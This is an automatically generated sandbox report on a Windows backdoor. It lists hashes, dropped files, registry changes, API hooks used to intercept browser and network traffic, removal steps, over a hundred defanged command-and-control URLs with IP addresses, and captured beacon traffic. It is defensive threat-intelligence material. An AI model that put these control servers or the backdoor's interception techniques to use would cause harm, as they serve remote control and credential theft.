HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Heur.Zybut.1 (B) (Emsisoft), Gen:Heur.Zybut.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2786cbabcd57f37bc167ceb8a7c6de6c
SHA1: 8ab8c1f4da624c6863c18e4d0eaaa31155084cf8
SHA256: 9b885c3d036a2f94b2352322383e6799aecb038d539f48054b91cc393168f725
SSDeep: 6144:BgiD9CmFlaRUdduv9sZIUlfxryHfvau9hHoyrnETB2ebz:T9C3N2ZIUl4/njr8B2Yz
Size: 263680 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2008-01-10 22:31:36
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1616
The Backdoor injects its code into the following process(es):
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1616 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1616 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 57 EC 37 72 FE 84 78 F8 19 E4 84 17 62 F0 2E"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\jsvlax.exe_, \??\%WinDir%\apppatch\jsvlax.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöHêe?²ºoD¬òd¼Œ¤Kô1,Ã…Â $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€Ã‚Â\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂkDùâ€Âaâ€Â*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÄZ¡r»ôâ€Â)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÃÂ=éÃâ€Ãƒâ€˜Ãƒâ€˜Ã¢â‚¬Â°Ã‚¬q9|áÃÂù’‘ÃÂéšÄR"
Dropped PE files
MD5 | File path |
---|---|
91f2d8066a31de887e48e30545ce8816 | c:\WINDOWS\AppPatch\jsvlax.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Backdoor installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Backdoor installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Backdoor installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Backdoor installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Backdoor installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Backdoor installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1616
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: flouncey
Product Name: Canorousness
Product Version: 1.7.4.9
Legal Copyright: Knitter
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.8.7.1
File Description: africanthropus
Comments:
Language: English (United States)
Company Name: flounceyProduct Name: CanorousnessProduct Version: 1.7.4.9Legal Copyright: KnitterLegal Trademarks: Original Filename: Internal Name: File Version: 3.8.7.1File Description: africanthropusComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX1 | 4096 | 3381 | 3584 | 4.11995 | 5ca8758b50bde507e627becdf44a6897 |
.text | 8192 | 18397 | 18432 | 4.10307 | d3d0964c061dc60f7916c3972277c4a6 |
.b | 28672 | 67171 | 2048 | 4.03977 | 0e8429d2ddee1efcf0d0af1ab7fab5ed |
.rdata | 98304 | 27457 | 1536 | 2.88669 | 68e2621575b0ea1d4e93cd3680b56226 |
.edata | 126976 | 114375 | 76288 | 5.53033 | 0a8c26a3a29305690056c6cd49665ea4 |
.data | 241664 | 285014 | 6656 | 5.15793 | 5567b42cb2577da1dff07341a38ec095 |
.edata | 528384 | 192535 | 146432 | 5.53186 | 1434184dc08b2c631cb66d45420529d0 |
.tXJuJ | 724992 | 633252 | 4608 | 0 | b1e27aa018409de6bfd73f8afb883a65 |
.rsrc | 1359872 | 2572 | 3072 | 3.70019 | f55779d590a38be7408c663b2921f237 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
f331d7b25b956ea87d59ad294c0a9060
4790b969fbec046133f300fe459f8f0d
Network Activity
URLs
URL | IP |
---|---|
hxxp://cihunemyror.eu/login.php | 192.42.116.41 |
hxxp://fodakyhijyv.eu/login.php | 195.22.28.197 |
hxxp://lysovidacyx.eu/login.php | 185.28.193.192 |
hxxp://digivehusyd.eu/login.php | 69.195.129.70 |
hxxp://sso.anbtr.com/domain/vofozymufok.eu | 195.22.28.222 |
hxxp://sso.anbtr.com/domain/nopegymozow.eu | 195.22.28.222 |
hxxp://keraborigin.eu/login.php | 54.201.30.58 |
hxxp://sso.anbtr.com/domain/fodakyhijyv.eu | 195.22.28.222 |
hxxp://sso.anbtr.com/domain/marytymenok.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/519227042aaa4d45b3d8d04c6d6182c2 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/90623dde15463e9fb45001ad5063db65 | 195.22.28.197 |
hxxp://sso.anbtr.com/domain/gatedyhavyd.eu | 195.22.28.222 |
hxxp://sso.anbtr.com/domain/jewuqyjywyv.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/4abc123f5bc1fe014bbeb686d9306960 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40 | 195.22.28.197 |
hxxp://ww62.galokusemus.eu/ | 54.72.9.51 |
hxxp://sso.anbtr.com/domain/qeqinuqypoq.eu | 195.22.28.222 |
hxxp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 | 54.86.84.196 |
hxxp://sso.anbtr.com/domain/kemocujufys.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/daf1516824a145639bf41787e2765d81 | 195.22.28.197 |
hxxp://sso.anbtr.com/domain/rynazuqihoj.eu | 195.22.28.222 |
hxxp://ww92.dimutobihom.eu/ | 208.91.197.245 |
hxxp://sso.anbtr.com/domain/ciliqikytec.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/bd3d82839c544969cd7e5b6b151fa69e | 195.22.28.197 |
hxxp://sso.anbtr.com/domain/tucyguqaciq.eu | 195.22.28.222 |
hxxp://sso.anbtr.com/domain/lyvejujolec.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/1acef55da687a834a563e6c7f72341c6 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/f2c2596452aa9379694886959d3b2888 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/f89965e1c0417ff83998ff3762e77e38 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/d1e2832667be3ac8af2587e3c0958424 | 195.22.28.197 |
hxxp://fodakyhijyv.eu/be7c0ab0ac1acf15c755867799d818c8 | 195.22.28.197 |
hxxp://xuxusujenes.eu/login.php | 208.100.26.234 |
hxxp://fodakyhijyv.eu/71c55851e5901a95263b027885fa0411 | 195.22.28.197 |
hxxp://qekenilacap.eu/login.php | |
hxxp://sso.anbtr.com/domain/nojejecebuw.eu | 195.22.28.222 |
hxxp://fodakyhijyv.eu/367a5a5db4f631d0cc1ad3c79b85b63a | 195.22.28.197 |
hxxp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40 | 195.22.28.198 |
hxxp://ww62.pupujeguper.eu/ | 54.72.9.51 |
hxxp://ww62.digusebyvad.eu/ | 54.72.9.51 |
hxxp://ganycyhywek.eu/login.php | 185.28.193.192 |
hxxp://xuqufyduras.eu/login.php | 185.28.193.192 |
hxxp://nopegymozow.eu/login.php | 195.22.28.196 |
hxxp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65 | 195.22.28.197 |
hxxp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38 | 195.22.28.197 |
hxxp://qeqinuqypoq.eu/login.php | 195.22.28.199 |
hxxp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81 | 195.22.28.196 |
hxxp://ww92.masawocipel.eu/ | 208.91.197.245 |
hxxp://ww92.qetuluvolos.eu/ | 208.91.197.245 |
hxxp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e | 195.22.28.199 |
hxxp://marytymenok.eu/login.php | 195.22.28.199 |
hxxp://lykemujebeq.eu/login.php | 185.28.193.192 |
hxxp://vofozymufok.eu/login.php | 195.22.28.196 |
hxxp://ww62.xuqufyduras.eu/ | 54.72.9.51 |
hxxp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960 | 195.22.28.199 |
hxxp://ryhuzilywax.eu/login.php | 185.28.193.192 |
hxxp://dimutobihom.eu/login.php | 185.28.193.192 |
hxxp://ww92.qexofyqihid.eu/ | 208.91.197.245 |
hxxp://ww92.ryleryqacic.eu/ | 208.91.197.245 |
hxxp://tufecagemyl.eu/login.php | 185.28.193.192 |
hxxp://qebahilojam.eu/login.php | 185.28.193.192 |
hxxp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2 | 195.22.28.198 |
hxxp://novomyfexij.eu/login.php | 185.28.193.192 |
hxxp://jeluganusog.eu/login.php | 185.28.193.192 |
hxxp://mamixikusah.eu/login.php | 185.28.193.192 |
hxxp://ww92.qekikyvutic.eu/ | 208.91.197.245 |
hxxp://ww62.puregivytoh.eu/ | 54.72.9.51 |
hxxp://rynazuqihoj.eu/login.php | 195.22.28.197 |
hxxp://ww62.lykemujebeq.eu/ | 54.72.9.51 |
hxxp://norumikemem.eu/login.php | 185.28.193.192 |
hxxp://ww62.norumikemem.eu/ | 54.72.9.51 |
hxxp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411 | 195.22.28.197 |
hxxp://ww62.nozulufynax.eu/ | 54.72.9.51 |
hxxp://vocakemenir.eu/login.php | 185.28.193.192 |
hxxp://qexofyqihid.eu/login.php | 185.28.193.192 |
hxxp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8 | 195.22.28.197 |
hxxp://nojejecebuw.eu/login.php | 195.22.28.198 |
hxxp://kemocujufys.eu/login.php | 195.22.28.197 |
hxxp://ww92.jeluganusog.eu/ | 208.91.197.245 |
hxxp://ww62.vocakemenir.eu/ | 54.72.9.51 |
hxxp://pupujeguper.eu/login.php | 185.28.193.192 |
hxxp://ciliqikytec.eu/login.php | 195.22.28.198 |
hxxp://digusebyvad.eu/login.php | 185.28.193.192 |
hxxp://qetuluvolos.eu/login.php | 185.28.193.192 |
hxxp://masawocipel.eu/login.php | 185.28.193.192 |
hxxp://lyvejujolec.eu/login.php | 195.22.28.198 |
hxxp://ww92.mamixikusah.eu/ | 208.91.197.245 |
hxxp://ww62.ganycyhywek.eu/ | 54.72.9.51 |
hxxp://ww92.kevedorozup.eu/ | 208.91.197.245 |
hxxp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6 | 195.22.28.198 |
hxxp://jewuqyjywyv.eu/login.php | 195.22.28.197 |
hxxp://qekikyvutic.eu/login.php | 185.28.193.192 |
hxxp://tucyguqaciq.eu/login.php | 195.22.28.196 |
hxxp://galokusemus.eu/login.php | 185.28.193.192 |
hxxp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a | 195.22.28.199 |
hxxp://kevedorozup.eu/login.php | 185.28.193.192 |
hxxp://ww92.novomyfexij.eu/ | 208.91.197.245 |
hxxp://nozulufynax.eu/login.php | 185.28.193.192 |
hxxp://ww92.rynyhipexon.eu/ | 208.91.197.245 |
hxxp://lyvufixyvet.eu/login.php | 185.28.193.192 |
hxxp://xugiqonenuz.eu/login.php | 69.195.129.70 |
hxxp://puregivytoh.eu/login.php | 185.28.193.192 |
hxxp://rynyhipexon.eu/login.php | 185.28.193.192 |
hxxp://ww92.tufecagemyl.eu/ | 208.91.197.245 |
hxxp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424 | 195.22.28.196 |
hxxp://ww62.lyvufixyvet.eu/ | 54.72.9.51 |
hxxp://ryleryqacic.eu/login.php | 185.28.193.192 |
hxxp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888 | 195.22.28.199 |
hxxp://ww62.qebahilojam.eu/ | 54.72.9.51 |
hxxp://gatedyhavyd.eu/login.php | 195.22.28.196 |
puvybivihox.eu | 185.28.193.192 |
ww92.xuqufyduras.eu | 208.91.197.245 |
ww92.ryhuzilywax.eu | 208.91.197.245 |
ww62.ryhuzilywax.eu | 54.72.9.51 |
www.bing.com | 204.79.197.200 |
ww62.qetuluvolos.eu |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /domain/fodakyhijyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
Location: hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40
3e..Go hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/marytymenok.eu
Set-Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.tufecagemyl.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.tufecagemyl.eu..Vary: Accept-Encoding..
GET /domain/nojejecebuw.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
Location: hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a
3e..Go hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a..0..
GET /domain/qeqinuqypoq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
Location: hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e
3e..Go hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e..0..
GET /be7c0ab0ac1acf15c755867799d818c8 HTTP/1.1
Host: xsso.lyvejujolec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
19..Landed lyvejujolec.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/tucyguqaciq.eu
Set-Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /daf1516824a145639bf41787e2765d81 HTTP/1.1
Host: xsso.gatedyhavyd.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
19..Landed gatedyhavyd.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20 Nov 2015 09:09:08 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-Encoding..Content-Length: 287..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.vocakemenir.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.vocakemenir.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/rynazuqihoj.eu
Set-Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.mamixikusah.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.mamixikusah.eu..Vary: Accept-Encoding..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 20 Nov 2015 09:10:30 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 20 Nov 2015 09:10:30 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Nov 2015 09:10:30 GMT..Content-Type: text/html..Content-Length: 579..Connection: keep-alive..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/fodakyhijyv.eu
